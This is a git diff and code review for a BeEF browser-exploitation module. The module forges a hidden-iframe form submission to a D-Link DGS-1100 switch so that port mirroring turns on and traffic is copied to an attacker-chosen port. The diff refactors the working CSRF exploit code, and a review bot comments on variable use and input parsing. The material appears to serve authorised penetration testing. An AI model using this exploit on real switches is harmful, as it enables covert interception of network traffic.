diff --git a/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js b/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js
index b3b807c25..65fa2a18a 100644
--- a/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js
+++ b/modules/exploits/switch/dlink_dgs_1100_port_mirroring/command.js
@@ -10,45 +10,17 @@ beef.execute(function() { var totalports = parseInt('<%= @totalports %>'); var mirrorport = parseInt('<%= @mirrorport %>'); - var dlink_dgs_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', base + "/cgi/PortMirroring.cgi"); - form.setAttribute('method', 'POST'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'cEn'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'sTagP'); - input.setAttribute('value', mirrorport); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'sMode'); - input.setAttribute('value', 2); - form.appendChild(input); - var mask = ''; for (var i = 1; i <= totalports; i++) { mask += i == mirrorport ? "0" : "1"; } - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'SrcLst'); - input.setAttribute('value', mask); - form.appendChild(input); - - dlink_dgs_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/PortMirroring.cgi', 'POST', 'application/x-www-form-urlencoded', [ + { type: 'hidden', name: 'cEn', value: 1 }, + { type: 'hidden', name: 'sTagP', value: mirrorport }, + { type: 'hidden', name: 'sMode', value: 2 }, + { type: 'hidden', name: 'SrcLst', value: mask } + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
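Review bot: `dlink_dgs_iframe` is still assigned from `beef.dom.createIframeXsrfForm(...)`, but nothing in the visible hunk reads it any more, whereas the removed code needed the handle to append the form. The `beef.execute` callback continues outside the hunk, so if no later code uses the handle (for example to remove the iframe), either drop the variable or add that cleanup. The numeric literals in `{ type: 'hidden', name: 'cEn', value: 1 }` and `value: 2` rely on the helper stringifying them the way `setAttribute` did; that presumably holds but is not visible here, and a short comment saying what `cEn`, `sMode` and `SrcLst` encode would make the field list self-explanatory. The context lines also call `parseInt` without a radix, and the result message is sent even when either value is `NaN`; `parseInt('<%= @totalports %>', 10)` with an `isNaN` guard before building `mask` would keep the reported result accurate.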